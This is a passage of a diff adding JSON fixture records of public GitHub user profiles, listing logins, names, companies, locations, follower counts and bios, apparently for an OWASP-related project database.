101, + "created_at": "2015-10-28T17:01:56Z", + "updated_at": "2024-08-15T09:06:54Z", + "node_id": "MDQ6VXNlcjE1MzY2MTgz", + "bio": "I've been told that I am a SRE and Backend Engineer. I just consider myself a Creative Problem Solver and Quick Learner.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 681, + "fields": { + "nest_created_at": "2024-09-11T21:35:06.470Z", + "nest_updated_at": "2024-09-22T19:30:04.487Z", + "name": "Jan Rude", + "login": "whoot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8066322?v=4", + "company": "MGM Security Partners", + "location": "Germany", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-07-04T08:35:37Z", + "updated_at": "2024-06-12T21:10:34Z", + "node_id": "MDQ6VXNlcjgwNjYzMjI=", + "bio": "If you like my stuff, buy me a coffee ☕️ ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 682, + "fields": { + "nest_created_at": "2024-09-11T21:35:09.420Z", + "nest_updated_at": "2024-09-11T21:35:09.420Z", + "name": "Gearcapitan", + "login": "gearcapitan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13740942?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2015-08-11T02:38:04Z", + "updated_at": "2024-03-02T20:55:20Z", + "node_id": "MDQ6VXNlcjEzNzQwOTQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 683, + "fields": { + "nest_created_at": "2024-09-11T21:35:10.660Z", + "nest_updated_at": "2024-09-11T22:12:03.824Z", + "name": "", + "login": "iNoSec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27919673?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 10, + "public_gists_count": 7, + "public_repositories_count": 203, + "created_at": "2017-04-23T13:57:18Z", + "updated_at": "2021-07-30T12:39:13Z", + "node_id": "MDQ6VXNlcjI3OTE5Njcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 684, + "fields": { + "nest_created_at": "2024-09-11T21:35:12.774Z", + "nest_updated_at": "2024-09-11T21:35:12.774Z", + "name": "", + "login": "moaeddy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7292467?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-04-14T16:22:10Z", + "updated_at": "2023-08-11T21:27:34Z", + "node_id": "MDQ6VXNlcjcyOTI0Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 685, + "fields": { + "nest_created_at": "2024-09-11T21:35:14.100Z", + "nest_updated_at": "2024-09-11T21:35:14.100Z", + "name": "shawnwb", + "login": "taylorgag", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40200349?v=4", + "company": "Hohai University", + "location": "NanJing", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-06-12T09:48:51Z", + "updated_at": "2023-12-14T07:16:45Z", + "node_id": "MDQ6VXNlcjQwMjAwMzQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 686, + "fields": { + "nest_created_at": "2024-09-11T21:35:14.973Z", + "nest_updated_at": "2024-09-11T21:35:14.973Z", + "name": "Wildan", + "login": "khalidalwalid", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33023197?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-10-23T09:35:39Z", + "updated_at": "2023-10-01T03:53:11Z", + "node_id": "MDQ6VXNlcjMzMDIzMTk3", + "bio": "A common human being. Copyleft and opensource lover.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 687, + "fields": { + "nest_created_at": "2024-09-11T21:35:21.635Z", + "nest_updated_at": "2024-09-11T21:35:21.635Z", + "name": "Fabio Cerullo", + "login": "fcerullo", + "email": "fcerullo@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1568582?v=4", + "company": "OWASP", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 101, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-03-23T15:33:53Z", + "updated_at": "2023-07-20T17:46:13Z", + "node_id": "MDQ6VXNlcjE1Njg1ODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 688, + "fields": { + "nest_created_at": "2024-09-11T21:35:28.825Z", + "nest_updated_at": "2024-09-11T21:35:30.858Z", + "name": "Google Code Exporter", + "login": "GoogleCodeExporter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9614759?v=4", + "company": "Google, Inc.", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1848, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-11-07T19:46:28Z", + "updated_at": "2023-05-30T14:09:10Z", + "node_id": "MDQ6VXNlcjk2MTQ3NTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 689, + "fields": { + "nest_created_at": "2024-09-11T21:35:29.207Z", + "nest_updated_at": "2024-09-22T19:45:05.587Z", + "name": "Mike Samuel", + "login": "mikesamuel", + "email": "mikesamuel@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/368886?v=4", + "company": "", + "location": "Denver, CO", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 355, + "public_gists_count": 23, + "public_repositories_count": 126, + "created_at": "2010-08-18T20:17:41Z", + "updated_at": "2023-05-27T16:42:47Z", + "node_id": "MDQ6VXNlcjM2ODg4Ng==", + "bio": "Programming languages ∩ security. Previously, Google technical infrastructure.", + "is_hireable": false, + "twitter_username": "mvsamuel" + } +}, +{ + "model": "github.user", + "pk": 690, + "fields": { + "nest_created_at": "2024-09-11T21:35:32.977Z", + "nest_updated_at": "2024-09-11T21:35:32.977Z", + "name": "Matthew Buckett", + "login": "buckett", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5921?v=4", + "company": "@oxctl", + "location": "UK", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 33, + "public_gists_count": 16, + "public_repositories_count": 125, + "created_at": "2008-04-08T21:05:50Z", + "updated_at": "2023-09-02T16:07:51Z", + "node_id": "MDQ6VXNlcjU5MjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "buckett" + } +}, +{ + "model": "github.user", + "pk": 691, + "fields": { + "nest_created_at": "2024-09-11T21:35:34.407Z", + "nest_updated_at": "2024-09-11T21:35:35.290Z", + "name": "", + "login": "sakhan19822", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13044870?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-06-25T06:31:33Z", + "updated_at": "2024-02-20T12:22:31Z", + "node_id": "MDQ6VXNlcjEzMDQ0ODcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 692, + "fields": { + "nest_created_at": "2024-09-11T21:35:36.998Z", + "nest_updated_at": "2024-09-11T21:35:36.998Z", + "name": "Andy Chen", + "login": "andy-h-chen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6620899?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2014-02-08T00:24:14Z", + "updated_at": "2024-05-10T15:35:43Z", + "node_id": "MDQ6VXNlcjY2MjA4OTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 693, + "fields": { + "nest_created_at": "2024-09-11T21:35:39.030Z", + "nest_updated_at": "2024-09-11T21:35:39.030Z", + "name": "", + "login": "yuyujulin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4941575?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2013-07-04T14:37:48Z", + "updated_at": "2024-09-02T03:43:33Z", + "node_id": "MDQ6VXNlcjQ5NDE1NzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 694, + "fields": { + "nest_created_at": "2024-09-11T21:35:39.836Z", + "nest_updated_at": "2024-09-22T19:45:09.796Z", + "name": "Jøran Vagnby Lillesand", + "login": "lillesand", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92167?v=4", + "company": "Bekk Consulting", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 21, + "public_gists_count": 5, + "public_repositories_count": 43, + "created_at": "2009-06-05T08:34:05Z", + "updated_at": "2024-03-06T08:25:26Z", + "node_id": "MDQ6VXNlcjkyMTY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 695, + "fields": { + "nest_created_at": "2024-09-11T21:35:41.923Z", + "nest_updated_at": "2024-09-11T21:35:41.923Z", + "name": "Eli_b", + "login": "elijahiuu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7199597?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-04-06T23:55:55Z", + "updated_at": "2024-05-05T20:32:00Z", + "node_id": "MDQ6VXNlcjcxOTk1OTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 696, + "fields": { + "nest_created_at": "2024-09-11T21:35:42.765Z", + "nest_updated_at": "2024-09-11T21:35:42.766Z", + "name": "aetherus", + "login": "Aetherus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2230789?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 11, + "public_gists_count": 5, + "public_repositories_count": 102, + "created_at": "2012-08-28T00:03:38Z", + "updated_at": "2024-08-28T11:24:21Z", + "node_id": "MDQ6VXNlcjIyMzA3ODk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 697, + "fields": { + "nest_created_at": "2024-09-11T21:35:45.133Z", + "nest_updated_at": "2024-09-11T21:35:45.133Z", + "name": "Joan Karadimov", + "login": "joankaradimov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/221979?v=4", + "company": "", + "location": "Sofia, Bulgaria", + "collaborators_count": 0, + "following_count": 87, + "followers_count": 71, + "public_gists_count": 2, + "public_repositories_count": 57, + "created_at": "2010-03-13T16:52:15Z", + "updated_at": "2024-08-07T07:17:53Z", + "node_id": "MDQ6VXNlcjIyMTk3OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "karadimov" + } +}, +{ + "model": "github.user", + "pk": 698, + "fields": { + "nest_created_at": "2024-09-11T21:35:45.991Z", + "nest_updated_at": "2024-09-11T21:35:45.991Z", + "name": "", + "login": "ClaireJu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11702398?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-03-29T03:44:10Z", + "updated_at": "2019-02-22T04:21:08Z", + "node_id": "MDQ6VXNlcjExNzAyMzk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 699, + "fields": { + "nest_created_at": "2024-09-11T21:35:46.868Z", + "nest_updated_at": "2024-09-11T21:35:46.868Z", + "name": "Christopher Rivera", + "login": "crivera", + "email": "chris.rivera@taxfyle.com", + "avatar_url": "https://avatars.githubusercontent.com/u/356611?v=4", + "company": "Taxfyle", + "location": "United States", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2010-08-06T20:39:16Z", + "updated_at": "2024-09-11T20:03:23Z", + "node_id": "MDQ6VXNlcjM1NjYxMQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 700, + "fields": { + "nest_created_at": "2024-09-11T21:35:48.122Z", + "nest_updated_at": "2024-09-11T21:35:50.505Z", + "name": "", + "login": "pickle-weasle", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13419930?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-07-20T15:07:45Z", + "updated_at": "2024-07-30T11:38:25Z", + "node_id": "MDQ6VXNlcjEzNDE5OTMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 701, + "fields": { + "nest_created_at": "2024-09-11T21:35:51.723Z", + "nest_updated_at": "2024-09-11T21:35:56.331Z", + "name": "Kai", + "login": "topcoderKai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1634477?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-04-11T20:38:20Z", + "updated_at": "2023-06-11T04:13:45Z", + "node_id": "MDQ6VXNlcjE2MzQ0Nzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 702, + "fields": { + "nest_created_at": "2024-09-11T21:35:52.595Z", + "nest_updated_at": "2024-09-11T21:35:52.595Z", + "name": "", + "login": "dpena", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/576690?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2011-01-21T15:06:35Z", + "updated_at": "2020-07-19T18:12:43Z", + "node_id": "MDQ6VXNlcjU3NjY5MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 703, + "fields": { + "nest_created_at": "2024-09-11T21:35:54.222Z", + "nest_updated_at": "2024-09-11T21:35:54.222Z", + "name": "Gaspard van Koningsveld", + "login": "qwertzguy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2158944?v=4", + "company": "", + "location": "California, USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 10, + "created_at": "2012-08-15T20:07:15Z", + "updated_at": "2024-08-27T17:43:08Z", + "node_id": "MDQ6VXNlcjIxNTg5NDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 704, + "fields": { + "nest_created_at": "2024-09-11T21:35:55.113Z", + "nest_updated_at": "2024-09-11T21:35:55.113Z", + "name": "Mehdi Mirzaie", + "login": "mehretaban", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/893338?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2011-07-04T11:11:51Z", + "updated_at": "2022-09-07T01:52:16Z", + "node_id": "MDQ6VXNlcjg5MzMzOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 705, + "fields": { + "nest_created_at": "2024-09-11T21:35:58.401Z", + "nest_updated_at": "2024-09-11T21:35:58.401Z", + "name": "", + "login": "kadianravi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38218957?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-09T14:36:00Z", + "updated_at": "2020-11-08T09:39:35Z", + "node_id": "MDQ6VXNlcjM4MjE4OTU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 706, + "fields": { + "nest_created_at": "2024-09-11T21:35:59.195Z", + "nest_updated_at": "2024-09-22T19:29:16.011Z", + "name": "Konrad Windszus", + "login": "kwin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/185025?v=4", + "company": "Netcentric (@Netcentric)", + "location": "Munich", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 64, + "public_gists_count": 0, + "public_repositories_count": 134, + "created_at": "2010-01-19T00:10:35Z", + "updated_at": "2024-08-30T06:43:33Z", + "node_id": "MDQ6VXNlcjE4NTAyNQ==", + "bio": "Solution Architect @ Cognizant Netcentric, Apache Sling, Jackrabbit and Maven PMC member", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 707, + "fields": { + "nest_created_at": "2024-09-11T21:36:00.397Z", + "nest_updated_at": "2024-09-22T19:29:16.962Z", + "name": "Laurence Gonsalves", + "login": "xenomachina", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50810?v=4", + "company": "Niphtio, Inc.", + "location": "California, USA", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 34, + "public_gists_count": 5, + "public_repositories_count": 41, + "created_at": "2009-02-01T02:02:10Z", + "updated_at": "2024-06-29T22:51:33Z", + "node_id": "MDQ6VXNlcjUwODEw", + "bio": "Founder of @Niphtio. \r\n\r\nFormerly @Google (Google Reader, GXP, AdWords, AdSense, and more)", + "is_hireable": false, + "twitter_username": "laurence" + } +}, +{ + "model": "github.user", + "pk": 708, + "fields": { + "nest_created_at": "2024-09-11T21:36:01.302Z", + "nest_updated_at": "2024-09-11T21:36:01.302Z", + "name": "Frank", + "login": "fvschie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3294996?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-01-17T10:19:57Z", + "updated_at": "2023-08-06T15:22:58Z", + "node_id": "MDQ6VXNlcjMyOTQ5OTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 709, + "fields": { + "nest_created_at": "2024-09-11T21:36:03.010Z", + "nest_updated_at": "2024-09-11T21:36:03.010Z", + "name": "Galit Tugi", + "login": "GalitTugi", + "email": "galit.tugi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5370823?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-09-03T07:43:15Z", + "updated_at": "2024-01-21T11:50:43Z", + "node_id": "MDQ6VXNlcjUzNzA4MjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 710, + "fields": { + "nest_created_at": "2024-09-11T21:36:03.823Z", + "nest_updated_at": "2024-09-22T19:28:00.923Z", + "name": "Marcel Stör", + "login": "marcelstoer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/624195?v=4", + "company": "@ThingPulse @NodeMCU", + "location": "Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 334, + "public_gists_count": 22, + "public_repositories_count": 32, + "created_at": "2011-02-17T22:20:09Z", + "updated_at": "2024-09-17T11:20:36Z", + "node_id": "MDQ6VXNlcjYyNDE5NQ==", + "bio": "Passionate clean coder, leading by example.\r\n@ThingPulse co-founder. @nodemcu firmware committer. Environmentalist.", + "is_hireable": false, + "twitter_username": "frightanic" + } +}, +{ + "model": "github.user", + "pk": 711, + "fields": { + "nest_created_at": "2024-09-11T21:36:04.660Z", + "nest_updated_at": "2024-09-11T21:36:04.660Z", + "name": "Leo Huang", + "login": "LeoHuang2015", + "email": "452054281@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4847400?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 94, + "public_gists_count": 0, + "public_repositories_count": 116, + "created_at": "2013-06-27T07:59:18Z", + "updated_at": "2024-05-20T03:10:38Z", + "node_id": "MDQ6VXNlcjQ4NDc0MDA=", + "bio": "Security", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 712, + "fields": { + "nest_created_at": "2024-09-11T21:36:05.518Z", + "nest_updated_at": "2024-09-11T21:36:05.518Z", + "name": "", + "login": "RafalZientara", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26741928?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2017-03-28T13:14:37Z", + "updated_at": "2024-06-21T15:41:49Z", + "node_id": "MDQ6VXNlcjI2NzQxOTI4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 713, + "fields": { + "nest_created_at": "2024-09-11T21:36:06.326Z", + "nest_updated_at": "2024-09-11T21:36:06.326Z", + "name": "", + "login": "PriyankPurwar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28762362?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-05-17T16:57:25Z", + "updated_at": "2024-04-27T16:12:03Z", + "node_id": "MDQ6VXNlcjI4NzYyMzYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 714, + "fields": { + "nest_created_at": "2024-09-11T21:36:07.331Z", + "nest_updated_at": "2024-09-11T21:36:07.331Z", + "name": "Aurélien Manteaux", + "login": "amanteaux", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3846854?v=4", + "company": "Coreoz", + "location": "Paris", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 18, + "created_at": "2013-03-12T20:26:49Z", + "updated_at": "2024-07-12T17:10:18Z", + "node_id": "MDQ6VXNlcjM4NDY4NTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 715, + "fields": { + "nest_created_at": "2024-09-11T21:36:08.551Z", + "nest_updated_at": "2024-09-11T21:36:08.551Z", + "name": "", + "login": "sapio-dwelch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28358726?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-05-03T17:25:50Z", + "updated_at": "2024-01-08T15:31:42Z", + "node_id": "MDQ6VXNlcjI4MzU4NzI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 716, + "fields": { + "nest_created_at": "2024-09-11T21:36:09.402Z", + "nest_updated_at": "2024-09-11T21:36:09.402Z", + "name": "Rafael Godoy", + "login": "rafaeljcg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5618837?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2013-10-05T17:36:40Z", + "updated_at": "2024-09-03T12:52:00Z", + "node_id": "MDQ6VXNlcjU2MTg4Mzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 717, + "fields": { + "nest_created_at": "2024-09-11T21:36:10.248Z", + "nest_updated_at": "2024-09-11T21:36:10.248Z", + "name": "Abhishek", + "login": "mrabhishek", + "email": "mr.abhishekm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1452406?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2012-02-20T01:04:42Z", + "updated_at": "2024-08-02T20:34:13Z", + "node_id": "MDQ6VXNlcjE0NTI0MDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 718, + "fields": { + "nest_created_at": "2024-09-11T21:36:11.057Z", + "nest_updated_at": "2024-09-11T21:36:11.057Z", + "name": "Evgeniy Sokolov", + "login": "eugine", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1188777?v=4", + "company": "", + "location": "Ukraine, Kyiv", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 43, + "created_at": "2011-11-11T15:42:24Z", + "updated_at": "2024-03-06T15:38:57Z", + "node_id": "MDQ6VXNlcjExODg3Nzc=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 719, + "fields": { + "nest_created_at": "2024-09-11T21:36:11.904Z", + "nest_updated_at": "2024-09-11T21:36:11.904Z", + "name": "Brian Krische", + "login": "krische", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1189328?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2011-11-11T20:53:17Z", + "updated_at": "2024-08-26T20:12:37Z", + "node_id": "MDQ6VXNlcjExODkzMjg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 720, + "fields": { + "nest_created_at": "2024-09-11T21:36:13.116Z", + "nest_updated_at": "2024-09-11T21:36:14.330Z", + "name": "yangbongsoo", + "login": "yangbongsoo", + "email": "goodbs1000@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7060510?v=4", + "company": "Naver Corp. Platform Labs", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 53, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2014-03-25T15:56:58Z", + "updated_at": "2024-08-21T11:23:37Z", + "node_id": "MDQ6VXNlcjcwNjA1MTA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 721, + "fields": { + "nest_created_at": "2024-09-11T21:36:15.589Z", + "nest_updated_at": "2024-09-11T21:36:15.589Z", + "name": "", + "login": "rasmitam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34741563?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-12-21T11:50:31Z", + "updated_at": "2024-07-10T11:00:58Z", + "node_id": "MDQ6VXNlcjM0NzQxNTYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 722, + "fields": { + "nest_created_at": "2024-09-11T21:36:16.411Z", + "nest_updated_at": "2024-09-11T21:36:16.411Z", + "name": "Andrew Potter", + "login": "apottere", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1980504?v=4", + "company": "@animavirtuality", + "location": "Burlington, VT, USA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 19, + "public_gists_count": 4, + "public_repositories_count": 69, + "created_at": "2012-07-15T20:59:22Z", + "updated_at": "2024-07-17T18:57:59Z", + "node_id": "MDQ6VXNlcjE5ODA1MDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 723, + "fields": { + "nest_created_at": "2024-09-11T21:36:17.669Z", + "nest_updated_at": "2024-09-11T21:36:17.669Z", + "name": "", + "login": "pcelentano", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1585820?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2012-03-29T04:06:20Z", + "updated_at": "2023-03-22T16:57:10Z", + "node_id": "MDQ6VXNlcjE1ODU4MjA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 724, + "fields": { + "nest_created_at": "2024-09-11T21:36:18.495Z", + "nest_updated_at": "2024-09-11T21:36:18.495Z", + "name": "Peter Fan", + "login": "saaspeter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3772321?v=4", + "company": "", + "location": "China", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 41, + "created_at": "2013-03-05T04:53:00Z", + "updated_at": "2024-07-17T04:20:02Z", + "node_id": "MDQ6VXNlcjM3NzIzMjE=", + "bio": "I am a software engineer, interested in web development and security", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 725, + "fields": { + "nest_created_at": "2024-09-11T21:36:19.320Z", + "nest_updated_at": "2024-09-11T21:36:19.320Z", + "name": "Manan Gurjar", + "login": "manangurjar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11473727?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-03-14T11:50:33Z", + "updated_at": "2023-06-21T16:05:14Z", + "node_id": "MDQ6VXNlcjExNDczNzI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 726, + "fields": { + "nest_created_at": "2024-09-11T21:36:20.552Z", + "nest_updated_at": 